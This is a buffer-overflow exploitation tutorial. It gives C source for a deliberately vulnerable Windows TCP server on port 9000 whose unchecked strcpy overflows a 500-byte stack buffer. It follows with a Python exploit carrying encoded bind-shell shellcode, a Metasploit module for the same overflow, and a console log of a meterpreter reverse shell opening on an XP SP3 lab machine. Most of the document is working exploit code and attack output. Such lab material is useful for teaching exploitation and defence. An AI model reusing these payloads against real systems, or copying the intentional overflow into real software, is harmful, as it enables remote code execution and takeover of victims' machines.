Create Vuln Server
Compile the source code below with VC6.0 or Dev-C++ to produce vuln-server.exe; the exploit offsets later on this page were measured against that build.
#include <iostream.h>
#include <stdio.h>
#include <winsock.h>
#include <windows.h>
//load windows socket
#pragma comment(lib, "wsock32.lib")
// Process exit codes returned by main(): SS_OK on success, SS_ERROR when
// any Winsock call fails.
#define SS_ERROR 1
#define SS_OK 0
// Intentionally vulnerable sink: str is copied into a fixed 500-byte stack
// buffer with strcpy(), which performs no length check. A message of 500
// bytes or more overruns buf and overwrites whatever the compiler placed
// above it in the frame; the exploits on this page put their return-address
// overwrite at byte 500. Nothing here depends on buf afterwards -- the copy
// exists only to trigger the overflow. A bounded copy (strncpy with an
// explicit terminator, or rejecting strlen(str) >= sizeof(buf)) would close
// the hole, but the rest of this page relies on it being open.
void pr( char *str)
{
char buf[500]="";
strcpy(buf,str);
}
// Report a failed socket call in a modal message box captioned
// "socket Error", then tear Winsock down with WSACleanup(). Callers are
// expected to return an error code right after this; they do not need to
// call WSACleanup() themselves.
void sError(char *str)
{
    const char *caption = "socket Error";
    MessageBox(NULL, str, caption, MB_OK);
    WSACleanup();
}
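// Entry point. Initializes Winsock, listens on tcp/9000, accepts a single
// client, reads one message from it and passes that message to pr().
// argc/argv are unused; the port is fixed.
//
// Returns SS_OK once the message has been handed to pr() and the sockets
// are closed, SS_ERROR if any Winsock call failed (the failure is reported
// through sError(), which also calls WSACleanup()).
//
// The listener is intentionally simple: the bug this program exists to
// demonstrate is the unchecked strcpy() in pr(), not anything in here.
int main(int argc, char **argv)
{
    WORD sockVersion;
    WSADATA wsaData;
    int rVal;
    // Receive buffer. The initializer zero-fills it and the recv() below
    // never writes the last byte, so the message is always NUL-terminated
    // before strcpy() in pr() walks it.
    char Message[5000]="";
    // Unused. Left in place so this build keeps the stack layout of the
    // binary the exploit offsets on this page were measured against; drop
    // it only if you re-measure those offsets.
    char buf[2000]="";
    // server port: 9000
    u_short LocalPort;
    LocalPort = 9000;

    // Winsock 1.1 is sufficient for the calls used here. A failed
    // WSAStartup() used to be ignored, so every later call would have
    // failed with WSANOTINITIALISED and a misleading message.
    sockVersion = MAKEWORD(1,1);
    if(WSAStartup(sockVersion, &wsaData) != 0)
    {
        sError("Failed WSAStartup()");
        return SS_ERROR;
    }

    //create server socket
    SOCKET serverSocket = socket(AF_INET, SOCK_STREAM, 0);
    if(serverSocket == INVALID_SOCKET)
    {
        sError("Failed socket()");
        return SS_ERROR;
    }

    // Zero the whole structure first so sin_zero is not left uninitialized.
    SOCKADDR_IN sin;
    ZeroMemory(&sin, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_port = htons(LocalPort);
    sin.sin_addr.s_addr = INADDR_ANY;   // every local interface
    //bind the socket
    rVal = bind(serverSocket, (LPSOCKADDR)&sin, sizeof(sin));
    if(rVal == SOCKET_ERROR)
    {
        closesocket(serverSocket);
        sError("Failed bind()");   // sError() already calls WSACleanup()
        return SS_ERROR;
    }
    //get socket to listen
    rVal = listen(serverSocket, 10);
    if(rVal == SOCKET_ERROR)
    {
        closesocket(serverSocket);
        sError("Failed listen()");
        return SS_ERROR;
    }
    printf("[+] listening on tcp/9000... \n");
    //wait for a client to connect
    SOCKET clientSocket;
    clientSocket = accept(serverSocket, NULL, NULL);
    if(clientSocket == INVALID_SOCKET)
    {
        closesocket(serverSocket);
        sError("Failed accept()");
        return SS_ERROR;
    }

    // Read one message. recv() reports failure as SOCKET_ERROR with the
    // cause in WSAGetLastError(); the earlier loop compared the byte count
    // with WSAECONNRESET (a value recv() never returns) and retried forever
    // on any persistent error. Leaving the final byte of Message untouched
    // guarantees a terminator even for a full 4999-byte read.
    int bytesRecv = recv(clientSocket, Message, sizeof(Message) - 1, 0);
    if(bytesRecv == SOCKET_ERROR)
    {
        printf("[-] recv() failed, error %d\n", WSAGetLastError());
        bytesRecv = 0;
    }
    else if(bytesRecv == 0)
    {
        printf("\nConnection Closed.\n");
    }
    Message[bytesRecv] = '\0';
    // NOTE: a single recv() can return only part of what the peer sent; the
    // client scripts on this page write the whole payload in one call, and
    // the original code also read just once.

    //Pass the data received to the function pr -- this is where the
    //unchecked strcpy() overflows a 500-byte stack buffer.
    pr(Message);
    //close client socket
    closesocket(clientSocket);
    //close server socket
    closesocket(serverSocket);
    WSACleanup();
    return SS_OK;
}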
Stack Overflow
Exploit vuln-server.exe through the stack overflow in pr(): the first 500 bytes of the message fill the 500-byte stack buffer, and the next four bytes overwrite the saved return address (the `eip` value in the script below). The message must not contain 0x00, because strcpy() stops copying at the first NUL.
#!/usr/bin/env python
# -*- coding: utf8 -*-
import socket
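RHOST = "127.0.0.1"
RPORT = 9000

# Bytes of filler before the return-address overwrite: pr()'s stack buffer
# is 500 bytes, and the exploit writes the new return address right after it.
OFFSET = 500

# 7C86467B, little-endian. An address inside an XP SP3 system DLL that
# execution is redirected to (presumably a jmp esp-style trampoline -- the
# page does not say). It contains no 0x00, which matters because the
# server's strcpy() would stop at the first NUL.
EIP = b"\x7B\x46\x86\x7C"

# bad chars: 00
# windows/shell_bind_tcp - 355 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=seh, InitialAutoRunScript=, AutoRunScript=
SHELLCODE = (
    b"\xba\x09\xb0\x2e\x7e\xdb\xc0\xd9\x74\x24\xf4\x5d\x31"
    b"\xc9\xb1\x53\x83\xc5\x04\x31\x55\x0e\x03\x5c\xbe\xcc"
    b"\x8b\xa2\x56\x92\x74\x5a\xa7\xf3\xfd\xbf\x96\x33\x99"
    b"\xb4\x89\x83\xe9\x98\x25\x6f\xbf\x08\xbd\x1d\x68\x3f"
    b"\x76\xab\x4e\x0e\x87\x80\xb3\x11\x0b\xdb\xe7\xf1\x32"
    b"\x14\xfa\xf0\x73\x49\xf7\xa0\x2c\x05\xaa\x54\x58\x53"
    b"\x77\xdf\x12\x75\xff\x3c\xe2\x74\x2e\x93\x78\x2f\xf0"
    b"\x12\xac\x5b\xb9\x0c\xb1\x66\x73\xa7\x01\x1c\x82\x61"
    b"\x58\xdd\x29\x4c\x54\x2c\x33\x89\x53\xcf\x46\xe3\xa7"
    b"\x72\x51\x30\xd5\xa8\xd4\xa2\x7d\x3a\x4e\x0e\x7f\xef"
    b"\x09\xc5\x73\x44\x5d\x81\x97\x5b\xb2\xba\xac\xd0\x35"
    b"\x6c\x25\xa2\x11\xa8\x6d\x70\x3b\xe9\xcb\xd7\x44\xe9"
    b"\xb3\x88\xe0\x62\x59\xdc\x98\x29\x36\x11\x91\xd1\xc6"
    b"\x3d\xa2\xa2\xf4\xe2\x18\x2c\xb5\x6b\x87\xab\xba\x41"
    b"\x7f\x23\x45\x6a\x80\x6a\x82\x3e\xd0\x04\x23\x3f\xbb"
    b"\xd4\xcc\xea\x56\xdc\x6b\x45\x45\x21\xcb\x35\xc9\x89"
    b"\xa4\x5f\xc6\xf6\xd5\x5f\x0c\x9f\x7e\xa2\xaf\x8e\x22"
    b"\x2b\x49\xda\xca\x7d\xc1\x72\x29\x5a\xda\xe5\x52\x88"
    b"\x72\x81\x1b\xda\x45\xae\x9b\xc8\xe1\x38\x10\x1f\x36"
    b"\x59\x27\x0a\x1e\x0e\xb0\xc0\xcf\x7d\x20\xd4\xc5\x15"
    b"\xc1\x47\x82\xe5\x8c\x7b\x1d\xb2\xd9\x4a\x54\x56\xf4"
    b"\xf5\xce\x44\x05\x63\x28\xcc\xd2\x50\xb7\xcd\x97\xed"
    b"\x93\xdd\x61\xed\x9f\x89\x3d\xb8\x49\x67\xf8\x12\x38"
    b"\xd1\x52\xc8\x92\xb5\x23\x22\x25\xc3\x2b\x6f\xd3\x2b"
    b"\x9d\xc6\xa2\x54\x12\x8f\x22\x2d\x4e\x2f\xcc\xe4\xca"
    b"\x51\x3c\x34\xc7\xc6\xe7\xad\xaa\x8a\x17\x18\xe8\xb2"
    b"\x9b\xa8\x91\x40\x83\xd9\x94\x0d\x03\x32\xe5\x1e\xe6"
    b"\x34\x5a\x1e\x23"
)


def build_payload(junk_len=OFFSET, eip=EIP, shellcode=SHELLCODE,
                  nop_sled=20, trailer=1500):
    """Assemble the overflow message and return it as bytes.

    Layout, in order: ``junk_len`` filler bytes ("A"), the 4-byte
    return-address overwrite ``eip``, a ``nop_sled``-byte NOP sled, the
    ``shellcode``, then ``trailer`` more NOPs. The trailer is kept from the
    original script; presumably it is there so the bytes above the
    shellcode on the stack are harmless, but that is not verified here.
    With the defaults the message is 2379 bytes long.

    Everything is built from bytes literals so the result can be passed to
    ``socket.sendall`` on both Python 2 and Python 3 (the original used str
    literals, which fail on Python 3).
    """
    sled = b"\x90" * nop_sled
    tail = b"\x90" * trailer
    return b"A" * junk_len + eip + sled + shellcode + tail


def main(host=RHOST, port=RPORT):
    """Connect to the vulnerable server and send the overflow message.

    Does nothing except print a notice if the connection fails. ``sendall``
    is used instead of ``send`` so a short write cannot truncate the payload.
    The socket is always closed, even if sending raises.
    """
    csock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        ret = csock.connect_ex((host, port))
        if ret != 0:
            print("[-] connect to %s:%d failed (errno %d)" % (host, port, ret))
            return
        csock.sendall(build_payload())
    finally:
        csock.close()


if __name__ == "__main__":
    main()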
Write a Metasploit (MSF) exploit module for the same overflow.
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
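# Stack buffer overflow in the custom vuln-server listening on tcp/9000.
#
# The server copies the received message into a 500-byte stack buffer with
# strcpy(), so bytes 500..503 of the message overwrite the saved return
# address. This is a plain return-address overwrite, not an SEH overwrite:
# the Seh mixin is included only for generate_seh_record, which is used as
# a convenient builder for the 8-byte "short jump + address" pair that puts
# target.ret at Offset + 4 == 500 (the same position the Python script on
# this page writes its `eip` to).
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Custom Vulnable Tcp Server Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack buffer overflow in a custom Windows
        TCP server. The first 500 bytes of the received message fill a
        fixed-size stack buffer and the following four bytes overwrite the
        saved return address.
      },
      'Author'         => [ 'Nixawk' ],
      'License'        => MSF_LICENSE,
      'DefaultOptions' => {
        'EXITFUNC'      => 'process',
        'AllowWin32SEH' => true
      },
      'Payload'        => {
        'Space'           => 1400,
        # strcpy() in the target stops at the first NUL, so 0x00 can never
        # be delivered; 0xFF is excluded conservatively.
        'BadChars'        => "\x00\xFF",
        # Move ESP well below the injected payload so the decoder stub does
        # not overwrite itself while it runs.
        'StackAdjustment' => -3500
      },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Ret: address written over the saved return address (presumably
          # a jmp esp-style trampoline in an XP SP3 system DLL).
          # Offset: filler bytes before the 8-byte record built by
          # generate_seh_record, so that Ret lands at byte 500.
          ['Windows XP SP3 En', { 'Ret' => 0x7C86467B, 'Offset' => 496 }]
        ],
      'Privileged'     => false,
      'DefaultTarget'  => 0,
      # Framework date format is "Mon DD YYYY"; 'June 20 2015' is not.
      'DisclosureDate' => 'Jun 20 2015'
    ))

    register_options([Opt::RPORT(9000)], self.class)
  end

  # Send filler + return-address overwrite + encoded payload in one write,
  # then hand off to the payload handler.
  #
  # NOTE(review): an earlier run of this method recorded
  # "TypeError no implicit conversion of String into Integer"; the cause is
  # not visible from this code and the session transcript on this page shows
  # a later run succeeding.
  def exploit
    connect

    # The filler must not contain a NUL: strcpy() in the target stops at the
    # first 0x00, and rand_text draws from all 256 byte values, so with 496
    # bytes it would break the overwrite most of the time. rand_text_alpha
    # never emits 0x00 or 0xFF.
    sploit = rand_text_alpha(target['Offset'])
    sploit << generate_seh_record(target.ret)
    # No NOP sled: once the overwritten return address is popped, ESP points
    # at the byte right after the record, which is where the payload begins.
    sploit << payload.encoded

    sock.put(sploit)
    handler
    disconnect
  end
end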
Exploit Vuln Server with MSF
msf exploit(custom_vulnserver) > show options
Module options (exploit/windows/misc/custom_vulnserver):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.105 yes The target address
RPORT 9000 yes The target port
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC seh yes Exit technique (Accepted: , , seh, thread, process, none)
LHOST 192.168.1.108 yes The listen address
LPORT 8080 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows XP SP3 En
msf exploit(custom_vulnserver) > exploit
[*] Started reverse handler on 192.168.1.108:8080
[*] Sending stage (884270 bytes) to 192.168.1.105
[*] Meterpreter session 2 opened (192.168.1.108:8080 -> 192.168.1.105:1557) at 2015-06-22 11:16:47 +0000
meterpreter > sysinfo
Computer : CORELAN-LAB
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : zh_CN
Domain : MSHOME
Logged On Users : 2
Meterpreter : x86/win32
meterpreter >